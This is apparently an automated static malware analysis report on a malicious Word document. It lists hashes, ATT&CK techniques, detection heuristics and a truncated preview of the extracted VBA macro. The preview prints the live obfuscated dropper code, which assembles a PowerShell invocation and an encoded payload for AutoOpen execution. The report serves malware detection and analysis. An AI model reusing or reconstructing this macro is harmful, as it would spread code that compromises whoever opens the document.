Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bf50cbccf96a53c5…

MALICIOUS

Office (OLE)

229.2 KB Created: 2018-06-27 13:42:00 Authoring application: Microsoft Office Word First seen: 2018-07-23
MD5: fbc92d01f8b80a96cbd3ee1a64c0d1e7 SHA-1: e4d627e084c5f853d559d9cde48b0533d804973d SHA-256: bf50cbccf96a53c54a87f0d24146b5a715d2c7bcc4e2e047ce8842d63692e382
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a Microsoft Office document containing VBA macros. Heuristics indicate the presence of an AutoOpen macro that uses the Shell() function, a common technique for executing arbitrary code. The ClamAV detection name 'Doc.Malware.Shell-6883057-0' further supports this. The VBA script itself is heavily obfuscated but appears to be constructing strings that could be used for downloading or executing further stages.

Heuristics 7

  • ClamAV: Doc.Malware.Shell-6883057-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Shell-6883057-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8554 bytes
SHA-256: 6d754bc8754bfec4360d15eefc7dd35c946bd73cae4efbdb4f78e4852ec7e28f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "dzriVUls"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IMjTIYlYinKS"
Function kPiDS()
On Error Resume Next
uSCbkc = Sin(74533)
SFsjC = zKRwQf
lUwjZ = 53858
zYkGHW = 21406
raick = CDate(57027)
nRtTzk = 10315
SEDbqnrX = "Hell ." + Chr(40) + " $pSHom" + "e[21]" + Chr(43) + "$" + "Psh" + "OMe[3" + "0]" + Chr(43) + "'x'" + Chr(41) + " " + Chr(40) + Chr(40)
lCzRn = 85209
MrNun = kuzdHS
GKNppF = CDate(54999)
tfdua = 74553
ivmIo = Sin(75000)
wvovD = 25158
nUcntjlp = "'21l70R1" + "21-12" + "7-12-9" + "5&84>70&" + "28k9" + "4b83" + "l91l84&8" + "2k69H17" + "l1" + "27k" + "84k" + "69k"
aBUSNQ = 81306
FNHiwE = 53733
BOajP = OTTALC
HZFsh = Sin(71147)
NGVZvu = CDate(42378)
NVSfir = 71169
QtlBVCB = "31" + ">102&" + "84&" + "83k114k" + "93-88R84" + "}95H6" + "9H10b2" + "1b"
uawNjC = 75649
RpjjZ = 24654
YFnvAT = TbntLb
zrvXU = Sin(80787)
nupsuI = CDate(4948)
JQcbE = 48072
lZtYjIp = "100H7" + "1b6" + "7-12" + "k2" + "2H89@69@" + "69" + "}65&11-" + "30-30}70" + ">70}70" + "k3" + "1k93l"
IAKMoQ = 64823
iKQGTj = 61166
EzOaHP = MaGpV
NYrQF = Sin(83104)
GPZXnc = CDate(34314)
rWrlZW = 44004
UQjMQmqJ = "80&8" + "2}80&95" + "}82-8" + "9k80k31&" + "65R84" + "R30}" + "71>120b" + "82k104-" + "100k112}"
ShNRiT = 50860
zjKQW = 96585
uKwVm = TnjbmN
FPBGm = Sin(18695)
FHVnIw = CDate(72265)
wFizwk = 42162
mCDoJpoS = "10" + "1k83" + "}30" + "&113l89@" + "69@" + "69>6" + "5k11l" + "30" + "b30R70>" + "70H70@3"
MqEGUb = 66978
iIcZP = 21103
iiENv = nFQzuh
UMPdz = Sin(44350)
SXivBi = CDate(37442)
ZjaYB = 355
uCBvi = "1}" + "83k84R" + "69&80l3" + "1&66&94" + "k94>87" + "k88b69" + "}8" + "8&67H" + "84@66l31" + ">88-" + "67l30&"
WJBDU = 73607
IsczW = 7660
dhTbL = ZGiwkD
mSXLq = Sin(71916)
jhKVL = CDate(21513)
sBVwK = 41871
wOnuuzKY = "72" + "l8H" + "86-123>8" + "3H1l101" + "b82b104&" + "117b3" + "0-113@"
RDzRaz = 45393
JTLbw = 20364
nFtwf = lFUFH
qoihv = Sin(8155)
RiSRrF = CDate(18623)
mnHnt = 34687
sIPtzW = "89H69R" + "69>65l" + "11>3" + "0k3" + "0}70@70" + "l70R31b" + "93-80&95" + "k86" + "H8" + "8&69k" + "69}94R6"
cqQEnG = 57692
CMzLq = 39498
KXIqOB = iuoSKw
uXGMs = Sin(39925)
mNcPB = CDate(77831)
mKDhVJ = 78482
SAIoEQWj = "8&67l3" + "1H82}" + "94@92>" + "30&" + "100k83@6" + "4l" + "102-107" + "-86}1" + "15" + "&126-30" + "l11"
kPiDS = SEDbqnrX + nUcntjlp + QtlBVCB + lZtYjIp + UQjMQmqJ + mCDoJpoS + uCBvi + wOnuuzKY + sIPtzW + SAIoEQWj
DnzCB = 8018
XpEFHA = 96315
BFlUH = VwrDKI
YzIpQE = Sin(87435)
Urlfo = CDate(81173)
zQLzD = 11198
End Function
Function VEbzIA()
On Error Resume Next
ZFtVX = 74865
qFRZoh = 37305
CzvbiL = jNGqX
ANfaLv = Sin(95079)
toVhQ = CDate(77545)
ruVsO = 12520
ozQDkc = "3>89R" + "69&69k65" + "l11R30-" + "30l7" + "0@70" + "b7" + "0@3" + "1b8" + "4R" + "93&8" + "2k93H80" + "@66H88R8"
ipRRif = 67808
tYiCb = 74763
GQnmz = WnBsWj
WPozQM = Sin(48346)
XJAcX = CDate(1624)
bPLcuk = 54994
JBYsikHvG = "2>94>" + "82@" + "92>9" + "3l31>82b" + "94R92k3" + "0R" + "104H64&" + "105&9" + "1k92}8"
ptHiC = 48582
nTtHF = 5036
okuGz = sFjVu
ipuwj = Sin(21896)
aEFKO = CDate(24060)
QmDWPn = 4906
ddNQdkszP = "4>69}" + "5R1k116" + ">30" + "-113&89-" + "69b69l65" + "R11>30}" + "30R" + "70@70b70" + "&31l83H8" + "0&86" + "b88k8" + "4R95l95"
SZihl = 69322
zRFYq = 77596
mXsrAT = VqmBv
tPaTS = Sin(85836)
RCFjsz = CDate(9233)
JQpZKa = 99074
hvZBzX = "&80k" + "95>" + "80&67" + "@84@" + "70}31" + "R65R9" + "3&30R92&" + "84k85@88" + "-80-30R" + "93}99"
SJTZI = 4433
bMhcuN = 96905
iXJLP = CDate(73620)
EQjTJK = Sin(5798)
UbhAHm = 97984
FXLkVn = mTKiw
rXJwMzO = "-92@8" + "9b117@0" + "}30>22" + "H31" + ">9" + "8R65k9" + "3-8"
NCclF = 53519
wdSRJY = 89686
MYHiz = CDate(18372)
iAtUNk = Sin(72218)
EmYhC = 39756
fuDwlv = kNBGqO
ARfLV = "8R" + "69}25" + "l22" + "H113" + "&22l24" + "-10l21>1"
FYYfO = 49202
ANWAJN = 2745
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.